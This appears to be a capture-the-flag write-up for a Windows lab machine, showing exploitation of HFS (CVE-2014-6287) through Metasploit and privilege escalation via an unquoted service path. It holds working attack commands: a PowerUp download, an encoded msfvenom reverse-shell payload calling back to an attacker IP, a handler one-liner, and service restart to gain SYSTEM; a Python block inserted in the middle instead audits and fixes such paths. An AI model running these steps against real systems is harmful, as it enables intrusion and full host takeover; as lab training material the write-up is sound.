HFS on port 8080

CVE-2014-6287

Using msf:
windows/http/rejetto_hfs_exec

Pops it in one go.

search -f *.txt

Uh, next we use a script

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

upload PowerUp.ps1

load powershell
powershell_shell  // enter PowerShell mode

. .\PowerUp.ps1
Invoke-AllChecks
ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths

One service has CanRestart : True.

Its executable path contains spaces:
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
but it is not wrapped in quotes.

Windows will try to run C:\Program.exe first, then C:\Program Files (x86)\IObit\Advanced.exe, so the service can be hijacked directly.
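As an added audit example (not part of this writeup, not PowerUp code), the CreateProcess prefix rule above worked through in Python: it lists every prefix Windows would try before the real binary, the directories whose ACLs therefore need checking, and the `sc config` command that fixes the service by quoting its path. It goes beyond the two paths named above by computing the full prefix list; the service list, the `QuotedSvc`/`NoSpaceSvc` entries and the `split_exe` heuristic (first prefix ending in .exe is the intended binary) are constructed assumptions.

```python
import ntpath
# Constructed sample modelled on the PowerUp finding above (hypothetical, not live data).
SERVICES = [
    {"Name": "AdvancedSystemCareService9", "StartName": "LocalSystem",
     "PathName": r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"},
    {"Name": "QuotedSvc", "StartName": "LocalSystem",
     "PathName": r'"C:\Program Files\Vendor\Quoted Service\svc.exe" -run'},
    {"Name": "NoSpaceSvc", "StartName": "LocalSystem",
     "PathName": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

def split_exe(cmd):
    """Split an unquoted command line into (exe, args) using the heuristic that the
    first space-delimited prefix ending in .exe is the intended binary."""
    parts = cmd.split(" ")
    for i in range(1, len(parts) + 1):
        exe = " ".join(parts[:i])
        if exe.lower().endswith(".exe"):
            return exe, " ".join(parts[i:])
    return cmd, ""

def candidate_paths(path_name):
    """Binaries Windows would try *before* the intended one: CreateProcess walks an
    unquoted command line prefix by prefix at each space, appending .exe to a prefix
    without an extension, and stops at the first file that exists. Quoted => none."""
    cmd = path_name.strip()
    if cmd.startswith('"'):
        return []
    exe, _ = split_exe(cmd)
    parts, cands = exe.split(" "), []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        cands.append(prefix if ntpath.splitext(prefix)[1] else prefix + ".exe")
    return cands

def exposed_directories(candidates):
    """Directories whose ACLs decide the outcome: audit these for write/append
    rights granted to BUILTIN\\Users, Authenticated Users or Everyone."""
    return list(dict.fromkeys(ntpath.dirname(c) for c in candidates))

def remediation(name, path_name):
    """sc.exe command that quotes the executable (the fix), keeping arguments outside."""
    exe, args = split_exe(path_name.strip())
    return f'sc config {name} binPath= "\\"{exe}\\"{(" " + args) if args else ""}"'

def audit(services):
    """One finding per service whose binary lookup a local user could pre-empt."""
    return [{"Name": s["Name"], "StartName": s["StartName"], "Candidates": c,
             "CheckACLs": exposed_directories(c), "Fix": remediation(s["Name"], s["PathName"])}
            for s in services if (c := candidate_paths(s["PathName"]))]
```

On a real host, feed `audit` the output of `Get-CimInstance Win32_Service` (Name, PathName, StartName) instead of the constructed list.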

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.17.6.173 LPORT=4444 -e x86/shikata_ga_nai -f exe -o Advanced.exe

Then start the listener:
msfconsole -qx 'use exploit/multi/handler;set lhost 10.17.6.173;set lport 4444;set payload windows/meterpreter/reverse_tcp;run'

In shell mode:

net stop AdvancedSystemCareService9
net start AdvancedSystemCareService9

cat "C:\Users\Administrator\Desktop\root.txt"

Without msf:

Invoke-WebRequest -URI $URL -OutFile winPEAS.exe

Of course, we already know it is a service:

powershell -c "Get-Service"
Just run that directly.